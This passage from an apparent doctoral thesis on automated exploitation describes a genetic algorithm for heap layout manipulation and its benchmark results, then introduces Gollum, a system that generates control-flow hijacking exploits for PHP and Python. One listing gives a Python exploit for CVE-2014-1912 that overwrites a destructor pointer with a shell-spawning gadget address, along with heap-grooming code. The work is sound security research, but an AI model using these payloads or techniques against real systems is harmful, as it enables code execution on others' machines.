• Mutate: A number of Allocate or Free directives in the individual are selected probabilistically for mutation. If an Allocate is selected then with equal probability it will be mutated to either an Allocate using a different fragment ID, or to a Free. If a Free is selected then with equal probability it will be mutated to either a Free of a different allocation, or to an Allocate.

• Spray: A new sequence of Allocate directives is generated and placed at a randomly selected offset in the individual. The length of the sequence is randomly selected between a minimum and maximum provided by the user. The Allocate directives themselves are all identical, i.e. they contain the same fragment ID.

• Hole spray: As with the previous spraying operation, a new sequence of Allocate directives is generated. Then a sequence of Free directives that free every second

of the Allocate directives is generated5. These sequences are concatenated and placed at a random offset in the individual.

• Allocation Nudge: This operation is identical to the Spraying operation, except the maximum length of the sequence is much shorter. For example, in my implementation the Spraying operation can produce a new sequence containing thousands of Allocate directives, while this is capped at a maximum of 8.

• Free Nudge: This operation is identical to the Hole Spraying operation, except the maximum length of the sequence is much shorter. The difference in scale is the same as that between the Allocation Nudge and Spraying operations.

• Shorten: A contiguous section of the individual is randomly selected and removed.
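Two of these operators, and the decaying mutation count, can be sketched as follows. For brevity the individuals here are lists of `('alloc', fragment_id)` / `('free', allocation_index)` tuples rather than the 128-bit directives of Section 4.2.2, and the parameter defaults are illustrative.

```python
import random

def num_mutations(rng, d=0.5, cap=8):
    """At least one mutation is always applied; each further one is added
    with probability d, giving a geometrically decaying count, capped."""
    n = 1
    while n < cap and rng.random() < d:
        n += 1
    return n

def spray(rng, individual, frag_id, min_len=2, max_len=16):
    """Spray: insert a run of identical Allocate directives at a random offset."""
    run = [("alloc", frag_id)] * rng.randint(min_len, max_len)
    pos = rng.randrange(len(individual) + 1)
    return individual[:pos] + run + individual[pos:]

def hole_spray(rng, individual, frag_id, count=6):
    """Hole spray: spray `count` allocations, then free every second one,
    leaving holes that cannot be coalesced with their allocated neighbours."""
    allocs = [("alloc", frag_id)] * count
    frees = [("free", i) for i in range(0, count, 2)]
    pos = rng.randrange(len(individual) + 1)
    return individual[:pos] + allocs + frees + individual[pos:]
```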

Crossover

In a GA, the crossover operator selects two individuals and swaps content between them. My implementation uses two-point crossover, with a minor variation since the lengths of individuals in my system may differ. For each parent, parentA and parentB, a contiguous series of directives is selected. The length of each section is chosen randomly, and, unlike the standard approach to two-point crossover, these lengths may differ from each other. The sections are then swapped.
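This variable-length variant of two-point crossover can be sketched as follows; the function name and the use of tuple-list individuals are illustrative.

```python
import random

def two_point_variable(rng, parentA, parentB):
    """Two-point crossover for variable-length individuals: a randomly sized
    contiguous section is chosen in each parent and the two sections are
    swapped, so the children's lengths may differ from their parents'."""
    a0 = rng.randrange(len(parentA))
    a1 = rng.randint(a0, len(parentA))   # section may be empty
    b0 = rng.randrange(len(parentB))
    b1 = rng.randint(b0, len(parentB))
    childA = parentA[:a0] + parentB[b0:b1] + parentA[a1:]
    childB = parentB[:b0] + parentA[a0:a1] + parentB[b1:]
    return childA, childB
```

Because the two sections are simply exchanged, no directives are created or lost across the pair of children, even though each child's length can change.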

4.2.5 Evaluation and Fitness

To evaluate an individual, each of the directives must be converted into a valid input for the target application, and then this sequence of inputs is concatenated and embedded into the primitive or exploit candidate. For each new target the user must therefore provide a function that takes an individual, converts each directive into its corresponding code fragment, embeds the fragments in a skeleton input for the target program, feeds this input to the target and returns the distance between the source and destination. While there are a few steps to this, it is the only target-specific code that must be written in order to have the GA work with a new target program.

The distance d is calculated via (srcAddr − dstAddr), where srcAddr and dstAddr are the addresses of the source and destination allocation, respectively. From d the GA then calculates the fitness of the individual in the following manner:

5 The intuition for why this works is that usually some number of these allocations will end up adjacent to each other, and freeing every second one will result in a hole in the heap, as the chunks on either side of it will be allocated and thus the free chunk cannot be coalesced with them.

Algorithm 4 Selection algorithm
1: function Select(µ, pop, popF)
2:     noerr ← [], noerrF ← []
3:     orderok ← [], orderokF ← []
4:     i ← 0
5:     while i < len(pop) do
6:         if popF[i] ≠ 2^64 then
7:             noerr.append(pop[i])
8:             noerrF.append(popF[i])
9:             if popF[i] ≠ 2^64 − 1 then
10:                orderok.append(pop[i])
11:                orderokF.append(popF[i])
12:        i ← i + 1
13:    if len(orderok) > 0 then
14:        pop ← orderok
15:        popF ← orderokF
16:    else if len(noerr) > 0 then
17:        pop ← noerr
18:        popF ← noerrF
19:    e ← GetFracElitism()
20:    b, bF ← SelBest(pop, popF, µ ∗ e)
21:    r, rF ← SelDoubleTourn(pop, popF, µ ∗ (1 − e))
22:    return b + r, bF + rF

\[
\mathrm{fitness}(d) = \begin{cases} 2^{64} & \text{if } d \text{ is None} \\ 2^{64} - 1 & \text{if } d > 0 \\ \mathrm{abs}(d) & \text{otherwise} \end{cases} \tag{4.1}
\]

The selection process is explained in full in Section 4.2.6, but for now it is sufficient to note that the GA is configured to try and minimise the fitness value. If d is None it means that an error occurred during the evaluation of the individual. The most common cause of this is an out-of-memory condition in the target, which can occur if an individual is produced that contains too many allocation directives. If d is positive it means that the source and destination have been placed in the wrong order. Finally, if d is negative it means the source and destination have been placed in the correct order, although they may not be adjacent, and the fitness of the individual is simply the absolute value of the distance.
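Equation 4.1 translates directly into a few lines of Python; the sentinel constant names are my own.

```python
# Fitness per Equation 4.1, minimised by the GA. The sentinel values rank
# failed evaluations last and wrong-order layouts second-to-last.
ERROR = 2**64
WRONG_ORDER = 2**64 - 1

def fitness(d):
    """d = srcAddr - dstAddr, or None if evaluation failed (e.g. the target
    ran out of memory)."""
    if d is None:
        return ERROR
    if d > 0:                # source landed after the destination
        return WRONG_ORDER
    return abs(d)            # correct order: smaller distance is better
```

Any correct-order layout therefore beats any wrong-order layout, which in turn beats any failed evaluation, and among correct-order layouts the closer pair wins.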

4.2.6 Selection

The selection process is shown in Algorithm 4. First, the individuals are filtered into those that complete without an error (lines 6-8), and these are further filtered down to those that result in the source and destination being in the correct order (lines 9-11). Distance values of 2^64 and 2^64 − 1 are used to indicate an error in the evaluation of an individual, and the source and destination allocations being in the wrong order, respectively. Individuals that result in errors will not be selected for the next generation unless all other children, and all of the current population, also result in errors. Individuals that result in the source and destination being placed in the incorrect order will be considered ahead of individuals that result in errors, but only if there are no individuals that place the source and destination in the correct order (lines 13-18).

The SelBest (line 20) and SelDoubleTourn (line 21) functions are standard GA selection functions. The third argument to each is the number of individuals to select. The SelBest function provides elitist selection, meaning that the µ ∗ e best individuals are selected and are therefore guaranteed to move forward to the next generation. The value of e is controlled by a parameter provided by the user and retrieved by the GetFracElitism function (line 19).

The SelDoubleTourn function provides double tournament selection, which is used to select the remaining individuals. Tournament selection with tournament size t means that to select n individuals from a population P, one repeats n times the process of randomly selecting t individuals from P. From each set of t individuals the best is then selected according to some metric. In single tournament selection this metric is simply the fitness of the individual. Double tournament selection is designed to prevent bloat in the length of individuals, in situations where the length of individuals can vary [94].
To achieve this, each individual in the final population is selected by first running a fitness tournament to select two individuals from the population, and then running a size tournament between these two individuals. In the size tournament the shorter individual is selected with a probability between 0.5 and 1, depending on a parameter set by the user. I found double tournament selection to be an effective method of balancing the benefit of having the spraying mutations against the potential for these mutations to lead to longer and longer individuals without an improvement in fitness.
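Double tournament selection can be sketched as follows. The tournament size and the probability of keeping the shorter individual are illustrative parameter choices, not the values used in my implementation.

```python
import random

def sel_double_tourn(rng, pop, popF, n, fitness_t=2, size_prob=0.8):
    """Double tournament: each of the n picks runs a fitness tournament
    (size fitness_t, minimising) twice, then a size tournament between the
    two winners keeps the shorter one with probability size_prob."""
    def fitness_winner():
        idxs = [rng.randrange(len(pop)) for _ in range(fitness_t)]
        return min(idxs, key=lambda i: popF[i])

    chosen = []
    for _ in range(n):
        i, j = fitness_winner(), fitness_winner()
        short, long_ = (i, j) if len(pop[i]) <= len(pop[j]) else (j, i)
        chosen.append(pop[short] if rng.random() < size_prob else pop[long_])
    return chosen
```

The fitness tournaments keep selection pressure on layout quality, while the size tournament biases survival towards shorter individuals, counteracting the growth that the spraying mutations would otherwise cause.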

4.2.7 Implementation

I implemented the core genetic algorithm on top of DEAP [95], an evolutionary computing framework, in approximately 3500 lines of Python. I also made modifications to DEAP itself to increase parallelism. DEAP does not parallelise the creation of the initial population or the application of the mutation and crossover operators. When individuals are represented by bitstrings this can make sense as these stages are then quite cheap. However, in order to represent the diversity of directives available in our system, and their parameters, bitstrings are insufficient. Operations on our representation are relatively time consuming and thus parallelisation is necessary to achieve desirable performance.

4.3 Experiments

4.3.1 Research Questions

The hypothesis that I wished to test was that the genetic algorithm for heap layout manipulation is a more efficient and effective approach than random search. Thus, I designed experiments to answer the following research questions:

• RQ-1: Can EvoHeap solve more problems than random search?

• RQ-2: Are there any problems that are not solved by EvoHeap but are solved by random search?

• RQ-3: On problems that can be solved by both random search and EvoHeap, which approach is faster?

4.3.2 Experiments

I ran two sets of experiments to answer the research questions:

1. Synthetic benchmarks on top of the SIEVE framework. As discussed in Chapter 3, SIEVE provides a way to link a driver program with the avrlibc, dlmalloc and tcmalloc allocators, and then run benchmarks in which the goal is to place two allocations of a particular size adjacent to each other. The benchmarks vary in the allocator used, the size of the source and destination allocations, the temporal order in which the source and destination allocations are made, and the number of noisy allocations. In the experimentation section of Chapter 3, 2500 such benchmarks were defined, and then run under random search. To evaluate the GA, I categorised these 2500 benchmarks into four groups: those that were never solved by random search, those that were solved 33%-44% of the time, those that were solved 55%-66% of the time, and those that were solved every time. I designated these categories of benchmark Very-Hard, Med-Hard, Med-Easy and Very-Easy, respectively6. Of the 2500 synthetic benchmarks from Chapter 3 I randomly selected 5 in each category to use for testing and parameter tuning while implementing the GA, and randomly selected 20 others in each category to use for evaluation.

2. Language interpreter benchmarks on top of the SHRIKE framework. As discussed in Chapter 3, SHRIKE is a template-based exploit development system that takes in exploits that contain heap layout manipulation problems to be solved and automatically finds the required sequences of PHP code to solve these problems. To construct the language interpreter benchmarks I selected five heap-based buffer overflow vulnerabilities: CVE-2015-8865, CVE-2016-5093, CVE-2016-7126, CVE-2013-2110 and CVE-2018-10549. I then selected 10 data structures that are heap-allocated and have a pointer as their first field. From the five vulnerabilities and ten target data structures we end up with 50 benchmarks where the goal is to place the overflow source buffer adjacent to the heap-allocated data structure. I randomly selected 12 of these for use during development and reserved the remaining 38 to use for evaluation.

All of the experiments were run with 10 concurrent analysis processes on Intel Xeon E7-4870 2.40 GHz cores with 1 TB of available RAM. Each experiment was given a time budget of one hour, with the GA allowed to restart if it reached its generation limit and was still under its time budget. The GA was run with a population size of 200, a generation limit of 600, a mutation probability of 0.9, a crossover probability of 0.1, µ = 200 and λ = 200.
These values were arrived at by starting from defaults proposed in the genetic algorithms literature, and then experimenting with modifications using the benchmarks selected for this purpose as described above.

4.4 Analysis and Discussion

4.4.1 The Success Rate of EvoHeap on Synthetic Benchmarks

Figure 4.3 shows the success rate of various configurations of the GA, and of random search, on the 38 benchmarks. The evo bar corresponds to the default version of

6 There is no particular reasoning behind how I decided on this correspondence between solve percentage and each difficulty category, other than that it seemed sensible to me; i.e. something never solved by random search seems like something we could sensibly call ‘very hard’, for the purposes of comparison with the genetic algorithm.

[Figure 4.3 body: bar chart of ‘% Total Benchmarks Solved’ (y-axis, 0-100) against Configuration (x-axis: evo, no-spray, no-holes, rand).]

Figure 4.3: Total percentage of synthetic benchmarks solved by various configurations of the GA and random search.

the GA. The no-spray bar corresponds to the GA without spraying of allocations. The no-holes bar corresponds to the GA without the spraying of hole creation patterns. The rand bar corresponds to random search.

The evo GA configuration solves 95.3% of the synthetic benchmarks on average, with a standard deviation (sd) of 1.5%. Random search on average solves 51% (sd: 3.8%) of the benchmarks. The contribution of the spraying and hole creation mutation operators can be seen by comparing the evo configuration with the no-spray and no-holes configurations. The latter two have average success rates of 85% (sd: 4.7%) and 80.7% (sd: 4.8%), respectively.

Figure 4.4 shows the results of the same GA configurations and random search on the synthetic benchmarks, broken down by difficulty category. On average, the default evo GA configuration solves 100% (sd: 0%), 100% (sd: 0%), 97.3% (sd: 0.5%) and 80% (sd: 0.7%) of the benchmarks in each category, ordered from least to most difficult. Random search solves 100% (sd: 0%), 54.6% (sd: 3%), 41.3% (sd: 1.4%) and 8% (sd: 0.8%). We can again contrast the evo configuration with the no-spray and no-holes configurations and see that the spraying and hole creation

[Figure 4.4 bar chart omitted; bars per configuration grouped by difficulty category (Very-Easy, Med-Easy, Med-Hard, Very-Hard); y-axis: % Benchmarks Solved (0-100); x-axis: Configuration (evo, no-spray, no-holes, rand).]

Figure 4.4: Total percentage of synthetic benchmarks solved per difficulty category.

mutation operators contribute across all problem difficulties. On the Very-Hard benchmarks, the success rate drops from 80% to 64% when spraying is removed, and to 58% when hole creation is removed. On the Med-Hard benchmarks the success rate drops from 97% to 88% when spraying is removed, and remains unchanged when hole creation is removed, although the variance does increase slightly. On the Med-Easy benchmarks the success rate drops from 100% to 92% when spraying is removed, and to 77% when hole creation is removed. On the Very-Easy benchmarks the changes are slight, with the success rate dropping from 100% to 96% when spraying is removed, and actually increasing to 98% when hole creation is removed. If all experimental runs are considered together then there is only a single synthetic benchmark that is never solved by the evo GA configuration, while there are 16 (27%) that are never solved by random search. The benchmark that is unsolved by evo is also not solved by random search, although it was solved on at least one occasion by the no-holes configuration.

[Figure 4.5 bar chart omitted; y-axis: % Total Benchmarks Solved (0-100); x-axis: Configuration (evo, rand).]

Figure 4.5: The average percentage of PHP benchmarks solved.

4.4.2 The Success Rate of EvoHeap on PHP Benchmarks

Figure 4.5 shows the success rate of the GA in its default configuration and random search on the PHP benchmarks. On average, the GA solves 84.2% (sd: 0.0%) of the PHP benchmarks, while random search solves 61% (sd: 5.4%). There are 6 (15.7%) benchmarks that are never solved by the GA and 9 (23.6%) that are never solved by random search. Of the 6 not solved by the GA, 3 are solved by random search.

4.4.3 The Speed of EvoHeap on Synthetic Benchmarks

To compare the speed of the GA versus random search on synthetic benchmarks I selected the benchmarks that both approaches solved at least once during the earlier experiments. There are 42 such benchmarks. Figure 4.6 shows the average time difference between both approaches on solving these benchmarks. A bar of magnitude m rising above zero indicates that the GA was faster than random search on that benchmark by m seconds, while a bar falling below zero indicates that the GA was slower than random search by m seconds. The colour of the bar represents its difficulty category, as in Figure 4.4. For example, the first bar

[Figure 4.6 bar chart omitted; y-axis: Average Time Difference (s), approximately -100 to 1200; x-axis: Benchmarks (0-40).]

Figure 4.6: The number of seconds by which the evolutionary algorithm was faster than random search, for benchmarks that both approaches solved at least once.

indicates that on that particular Med-Easy benchmark the GA was faster than random search on average by approximately 1200 seconds, while the final bar indicates that on that particular Very-Easy benchmark the GA was slower than random search by approximately 90 seconds. The GA is faster on 31 (74%) of these and random search is faster on 11 (26%). All of the benchmarks on which random search is faster are in the Very-Easy category. When the GA is faster the average difference is 99 seconds, while when random search is faster the average difference is 66 seconds. The summation of all time saved is 55 seconds for the GA and 55 seconds for random search, a difference of 22 seconds in favour of the GA. Figure 4.7 shows the average percentage of benchmarks solved over time by the evo GA configuration and random search. At all points, except the first few seconds, the GA has solved more benchmarks. On average, after 5 minutes the GA has solved 94% (sd: 1.4%) while random search has solved 29.9% (sd: 3.34%).

[Figure 4.7 line chart omitted; y-axis: Avg. % of Benchmarks Solved (0-100); x-axis: Time (s), 0-1400; series: evo, rand.]

Figure 4.7: The average percentage of synthetic benchmarks solved by the genetic algorithm and random search.

4.4.4 The Speed of EvoHeap on PHP Benchmarks

To compare the speed of the GA versus random search on the PHP benchmarks I selected the benchmarks that both approaches solved at least once during the earlier experiments. There are 25 such benchmarks. Figure 4.8 shows the average time difference between both approaches. As with the synthetic benchmarks, a bar rising above 0 with a magnitude of m indicates that the GA is faster than random search by m seconds. For the PHP benchmarks the GA is faster in all cases. The average difference is 600 seconds, and the summation of all time saved is 15589 seconds (4h 19m 49s). Figure 4.9 shows the average percentage of PHP benchmarks solved over time by the GA and random search. At all points the GA has solved more benchmarks. After 5 minutes the GA has solved 77.6% (sd: 0.8%) while random search has solved 31% (sd: 4.1%).

[Figure 4.8 bar chart omitted; y-axis: Average Time Difference (s), 0-2200; x-axis: Benchmarks (0-25).]

Figure 4.8: The number of seconds by which the evolutionary algorithm was faster than random search, for PHP benchmarks that both approaches solved at least once.

4.4.5 Answers to Research Questions

RQ-1: Can EvoHeap solve more problems than random search?

Yes, EvoHeap conclusively solves more problems than random search in both the synthetic benchmarks and the language interpreter benchmarks.

RQ-2: Are there any problems that are not solved by EvoHeap but are solved by random search?

Three (7%) of the language interpreter benchmarks are solved by random search but not by EvoHeap. This indicates that it may be worth running both random search and the GA. As mentioned, on average after 5 minutes the GA has solved 77.6% of the total benchmarks and in total it solves 84%, which means it has solved 92% of the benchmarks that it will solve. One option could be to take some resources from the GA at this point and start applying them to random search.

[Figure 4.9 line chart omitted; y-axis: Avg. % of Benchmarks Solved (0-100); x-axis: Time (s), 0-3500; series: evo, rand.]

Figure 4.9: The average percentage of PHP benchmarks solved over time.

RQ-3: On problems that can be solved by both random search and EvoHeap, which approach is faster?

On the language interpreter benchmarks, EvoHeap is always faster, often by a considerable margin. On the synthetic benchmarks, EvoHeap is faster in a large majority of cases, often by a considerable margin. Random search is faster on a small number of the synthetic benchmarks, and in those cases the difference is small.

What if a cyber brain could possibly generate its own ghost, and create a soul all by itself? And if it did, just what would be the importance of being human then?

— Major Motoko Kusanagi

5 A Greybox Approach to Automatic Exploit Generation

5.1 Introduction

In Chapter 3 I introduced an automatic solution for the heap layout manipulation problem. This solution allows for a partially automated exploit generation workflow, where an exploit developer creates a template describing a heap layout problem to be solved, SHRIKE takes the template and solves the problem, and the exploit developer then completes the remainder of the exploit manually. In this chapter I continue to build on the ideas of Chapters 3 and 4, and introduce a fully automated approach to exploit generation. Automatic exploit generation (AEG) is the task of converting vulnerabilities into inputs that violate a security property of the target system. Attacking software written in languages that are not memory safe often involves hijacking the instruction pointer and redirecting it to code of the attacker’s choosing. The difficulty varies, depending on several parameters. For example, exploiting a stack-based buffer overflow in a local file parsing utility, on a system without Address Space Layout Randomisation (ASLR) or stack canaries, is well within the capabilities of existing AEG systems [32, 34]. However, by considering stronger protection mechanisms, different classes of target software, or different vulnerability classes, one finds a large set of open problems to be explored. In this chapter, I focus on automatic exploit generation for heap-based buffer overflows in language interpreters. From a security point of view, interpreters are a lucrative target because they are ubiquitous, and usually themselves written in

languages that are prone to memory safety vulnerabilities. From an AEG research point of view they are interesting as they represent a different class of program from that which has previously been considered. Most AEG systems are aimed at command-line utilities or systems that act essentially as file parsers. Interpreters break many of the assumptions that traditional AEG systems rely upon. One such assumption is that it is feasible to use symbolic execution to efficiently reason about the relationship between values in the input file and the behaviour of the target. As discussed in Chapter 2, the state space of interpreters is far too large, and there is far too much indirection between the values in the input program and the resulting machine state. As we will see later, many of the exploits generated require multiple valid lines of code in the language of the interpreter to be synthesised. To the best of my knowledge, while there is research showing how to apply symbolic execution to programs written in interpreted languages, there is no research which has shown how to efficiently explore the behaviour of interpreters themselves. Interpreters are prone to multiple classes of vulnerabilities, but I focus on heap overflows for a couple of reasons. Firstly, they are among the most common type of vulnerability, and secondly they have only been partially explored from the point of view of AEG. The exploitation of heap-based buffer overflows requires reasoning about the layout of the heap to ensure that the correct data is corrupted. Previously, researchers have shown [40, 41, 46] how to generate exploits under the assumption that the layout is correct, but here we present a solution that can automate the entire process, including heap layout manipulation. To address these challenges, in this chapter I will introduce Gollum, a modular, greybox system for primitive discovery and exploit generation using heap overflows.
Gollum takes as input a vulnerability trigger for a heap overflow and a set of test cases, such as the regression test suite for an interpreter. It produces full exploits, as well as primitives that can be used in manual exploit creation. Gollum is greybox in the sense that it uses fuzzing-inspired input generation with limited instrumentation, instead of techniques such as symbolic execution. It is modular in the sense that it solves the multiple stages of heap exploit generation separately. This is enabled via a custom memory allocator, called ShapeShifter, that allows one to request a particular heap layout to determine if such a layout would enable an exploit. If it does, then a separate stage searches for the input required to obtain this layout. I have evaluated Gollum on the PHP and Python language interpreters, using a variety of previously patched security vulnerabilities. Of the 10 exploited vulnerabilities, 5 do not have a previously existing public exploit. The evaluation shows that the approach is effective and efficient at exploit generation in interpreters, and an interesting direction to pursue for further work.

5.1.1 Model, Assumptions and Practical Applicability

Generic, automatic exploit generation against modern targets—with no prerequisites—is likely to be an open research problem for quite some time. The work discussed in this chapter removes some of the restrictions found in prior work, but others still remain in order to make the problem tractable enough to evaluate the improvements we are suggesting. We believe these assumptions are reasonable and can be lifted in the future without invalidating the main ideas presented. The assumptions are:

1. In the exploit generation phase the system assumes that the user can provide the system with a means to break Address Space Layout Randomisation (ASLR). For example, to generate an exploit that uses a Return-Oriented Programming (ROP) payload one needs to know the address of some executable code. I believe this is a reasonable assumption as an ASLR break can usually be discovered independently of the rest of an exploit, and reused across exploits.

2. The system assumes that control-flow integrity (CFI) protection is not deployed on the target binary. CFI is becoming more popular, but is far from ubiquitous. Defeating CFI can be treated as a separate stage, and other researchers have automated the process of building a CFI-defeating payload given a suitable primitive [49]. As further work it may be interesting to explore whether automatic solutions for defeating CFI could be used to extend the capabilities of Gollum to targets with CFI enabled.

3. In the heap layout manipulation phase I make the same assumptions as stated in Chapter 3, namely that the allocator in use is deterministic and that the starting state of the heap can be predicted.

With these assumptions we are of course still several steps from completely automatic AEG against harder targets, e.g., Chrome running on Windows 10. However, from an offensive point of view there are still practical implications from this work to go along with the advancements into new target classes and AEG architectures. In the evaluation I show that Gollum can generate exploits for the Python and PHP interpreters. While it might seem unusual to have a situation whereby an attacker can execute scripts in such languages and yet still not have crossed the security boundary, it does occur. Sandboxing projects exist for many interpreters in this class, with bug bounty programs offering rewards for breaking out of them under the assumption that one can execute code in the interpreter [96–98]. From a defensive point of view, Gollum could be used in the triage process to prioritise exploitable bugs. In such a scenario, one is likely willing to give the attacker the ‘benefit of the doubt’ and assume they have an ASLR break and a means to address complications such as non-determinism in the heap allocator. If one is willing to run Gollum against a target with these assumptions, then it could be applied directly to a much larger class of targets, including Javascript interpreters in web browsers.

5.2 System Overview and Motivating Example

To provide an intuition for the problems that Gollum solves, and an overview of its architecture, I will walk through a simplified variant of the exploitation process for CVE-2014-1912. A detailed walk-through of this process can be found in Section 5.6. This vulnerability is a heap-based buffer overflow in Python in the recvfrom_into function on socket objects. The vulnerability trigger found in the Python bug tracker is given at the start of Listing 5.1. Our objective is to utilise that vulnerability to generate a control-flow hijacking exploit for the Python interpreter. A work-flow diagram for Gollum is given in Figure 5.1.

[Figure 5.1 workflow diagram omitted; components: Vulnerability Trigger, Existing Tests, Test Preprocessing, Processed Tests, New Input Generation, Candidate Discovery, Layout Exploration, I/O Relationship, Primitive Database, Assisted Exploit Generation, Automatic Exploit Generation, Heap Layout Manipulation, Exploit.]

Figure 5.1: Workflow diagram showing how Gollum produces exploits and primitives.

1. Importing the Vulnerability Trigger. The process begins with importing the vulnerability trigger into Gollum. Gollum accepts the original vulnerability trigger, modified with comments to identify any imports the code depends on, the variable holding the overflow contents, and the line that triggers the overflow.

2. Injecting the Vulnerability Trigger into Tests. Gollum needs to figure out how to build objects on the heap that contain data worth corrupting, and how to make use of that data. It leverages the tests that come with the target interpreter to do this. In Section 5.3.2 I will explain where the tests come from and how they are preprocessed, but for now assume that we have a database of tests for the interpreter. The second code snippet in Listing 5.1 gives code from a test for the XML parsers in Python. Line 12 creates a heap-allocated parser object that contains a number of function pointers. One of these points to the object's destructor and will be called when the test function returns and the variable p goes out of scope. From the vulnerability trigger and the test case, Gollum will produce a set of new programs by injecting the vulnerability trigger at every line in the original test case. An example of one of the new programs is shown in Listing 5.1, starting at line 15.

3. Exploring Heap Layouts. Each new program combining the vulnerability trigger and a test is executed under ShapeShifter, a custom allocator that can detect heap-based overflows when they occur. When the overflow is detected, ShapeShifter records all live heap-allocated objects at that point. The state of the program after the overflow, and thus the exploitation possibilities, depends on what

 1  # --- Original vulnerability trigger ---
 2  import socket
 3  r, w = socket.socketpair()
 4  w.send(b'X' * 1024)
 5  r.recvfrom_into(bytearray(), 1024)
 6
 7  # --- Test for XML Parsing ---
 8  import unittest
 9  from xml.parsers import expat
10  class ParserTest(unittest.TestCase):
11      def testParserCreate(self):
12          p = expat.ParserCreate()
13
14  # --- Program combining test and trigger ---
15  class ParserTest(unittest.TestCase):
16      def testParserCreate(self):
17          p = expat.ParserCreate()
18          r, w = socket.socketpair()
19          w.send(b"X" * 1024)
20          r.recvfrom_into(bytearray(), 1024)
21
22  # --- Exploit with one-gadget payload ---
23  class ParserTest(unittest.TestCase):
24      def testParserCreate(self):
25          p = expat.ParserCreate()
26          r, w = socket.socketpair()
27          w.send(b"A" * 56 + b"\xb3\x8a\xf5")
28          r.recvfrom_into(bytearray(), 1024)
29
30  # --- Exploit with Heap Manipulation ---
31  class ParserTest(unittest.TestCase):
32      def testParserCreate(self):
33          self.v0 = bytearray(b'A' * 935)
34          self.v1 = bytearray(b'A' * 935)
35          self.v2 = bytearray(b'A' * 935)
36          self.v1 = 0
37          ...
38          p = expat.ParserCreate()
39          r, w = socket.socketpair()
40          w.send(b"A" * 56 + b"\xb3\x8a\xf5")
41          r.recvfrom_into(bytearray(), 1024)

Listing 5.1: The various Python programs involved in the exploitation process for the motivating example. The code under each comment would be a separate program, but they are presented in a single figure to save space. Imports are only shown for the first two code snippets.

Default Layout:           A  B  Source
Corruption Possibility 1: B  Source  A
Corruption Possibility 2: A  Source  B

Figure 5.2: Assume data is written from left to right. When the interpreter executes a program a single concrete allocation (indicated in green) will be located after the overflow source, but there are multiple other live objects (indicated in orange) on the heap that could have been allocated after the overflow source, if the heap was manipulated differently.

object is located in memory immediately after the source buffer for the overflow. To explore these possibilities we can run the program once for every live object at the point the overflow is triggered, ensuring that a different live object is corrupted on each run. For example, imagine that the heap layout looks like the ‘Default Layout’ shown in Figure 5.2 at the point where the overflow occurs. The overflow corrupts unused memory, and the program continues as if the overflow never happened. However, there are two live objects at this point, indicated by A and B. If the heap had been manipulated differently prior to the overflow, it is possible that either A or B could be located after the overflow source. Discovering the modifications required to the input program to achieve these layouts could be a complex task, and it may turn out that after achieving them they do not assist in generating an exploit. The ShapeShifter allocator allows us to request a particular layout, instead of having to solve for it. This lazy approach to heap layout resolution means we can first check if a layout is useful in generating an exploit and, if it is, then solve for that layout. In our example, suppose that the allocation labelled A corresponds to the allocation of the XML parser. When Gollum requests this layout the function pointers in the XML parser will be corrupted, and when the destructor is triggered the interpreter will crash when it attempts to call a corrupted pointer. At this point, Gollum logs the input program, the machine context at the crashing point, and the heap layout that was required to trigger the crash.

4. Determining Input-Output Relationships. To determine whether a crash provides a usable exploitation primitive, Gollum needs to determine what level of control it has over the machine state at the crash location. It does so by fuzzing integer and string values in the input program and observing the changes in register and memory values at the crash point.
This is explained in detail in Section 5.3.5. In the case of our example, assume for now that Gollum discovers that if the heap layout is correct then the 57th–64th bytes of the overflow string will corrupt the destructor function pointer of the parser.

5. Generating an Exploit Modulo a Heap Layout. Gollum has a set of functions for transforming crashes into exploits. Their applicability depends on the level of control that Gollum has over the machine state at the point where the crash occurs. For brevity in our example, assume that ASLR is entirely disabled and that our indicator of success is that the exploit spawns a ‘/bin/sh’ shell. In glibc there are sequences of instructions that, if called, will result in the execution of execve(‘/bin/sh’, NULL, NULL), and thus the spawning of a shell, without any further setup. Gollum uses the one_gadget tool [99] to discover the address of such gadgets and modifies the input program, using the information discovered in the previous step, to ensure that the destructor function pointer is redirected to point to the gadget address. The resulting exploit with the one_gadget payload is given as the second-to-last snippet in Listing 5.1. The overflow contents consist of 56 bytes of padding, followed by the lowest three bytes of the address of the gadget we wish to redirect execution to. I call this an exploit ‘modulo a heap layout’, meaning that it works and spawns a shell, but only under the ShapeShifter allocator, which ensures the heap layout meets the requirements for the exploit.

6. Solving the Heap Layout Problem. Finally, Gollum must solve the heap layout problem so that the exploit works when the interpreter is run using its real allocator. In Chapter 3 and Chapter 4 I introduced automatic solutions to this task. In order to use these solutions Gollum must produce a template describing a heap layout problem, which they can then process. I discuss how this is achieved in Section 5.5.1.
The final code snippet from Listing 5.1 shows the completed exploit, which automatically modifies the heap to ensure that the XML parser object is located after the overflow source.
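The overflow contents used in step 5—padding up to the corrupted field, followed by the low-order bytes of the gadget address in little-endian order—can be sketched as follows. This is an illustrative sketch rather than Gollum's code, and the gadget address used is a made-up value:

```python
import struct

def build_payload(padding_len: int, gadget_addr: int, addr_bytes: int = 3) -> bytes:
    """Padding up to the corrupted field, then the low-order bytes of the
    gadget address, little-endian. Writing only the low three bytes reuses
    the high-order bytes already present in the pointer in memory."""
    low_bytes = struct.pack("<Q", gadget_addr)[:addr_bytes]
    return b"A" * padding_len + low_bytes

# 0xf58ab3 stands in for the low three bytes of a one-gadget address.
payload = build_payload(56, 0xf58ab3)
assert payload == b"A" * 56 + b"\xb3\x8a\xf5"
```

The resulting bytes match the shape of the overflow string in the one-gadget snippet of Listing 5.1.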

5.3 Primitive Discovery

In this section I explain the functionality required to populate the primitive database. The exact definition of a primitive varies across the exploit development literature. For the purposes of this work, I consider two types of primitives:

• An ip-hijack primitive, which is an input to a program that results in a value being placed into the target’s instruction pointer (IP) register that is directly derived from attacker input. This sort of primitive will often manifest itself when a function pointer stored on the heap is corrupted and then later used in a call or jump instruction.

• A mem-write primitive, which is an input to a program that results in a write to a memory address that is directly derived from attacker input. This sort of primitive will often manifest itself when a data pointer is stored on the heap and then later used as the destination pointer for a write.

The process described in this section is designed to discover primitives of the above types, given a vulnerability trigger and tests for the target program. It discovers primitives that are ‘modulo a heap layout’, meaning that they require a particular heap layout in order to function, but do not achieve that layout on their own.

5.3.1 Vulnerability Importing

For a vulnerability trigger to be usable by Gollum, two aspects of the trigger must be indicated. Firstly, Gollum needs information on the data that will be used in the overflow. It needs to know which variable’s contents will be used in the overflow, whether the length of that variable can be modified or not and, if so, what the maximum length is. This information is used during primitive discovery and exploit generation, during which the length and content of the overflow will be altered. Secondly, it needs to know what line in the trigger actually causes the overflow to occur. Both types of information can be provided via ‘markup’ added to the trigger in the form of code comments.
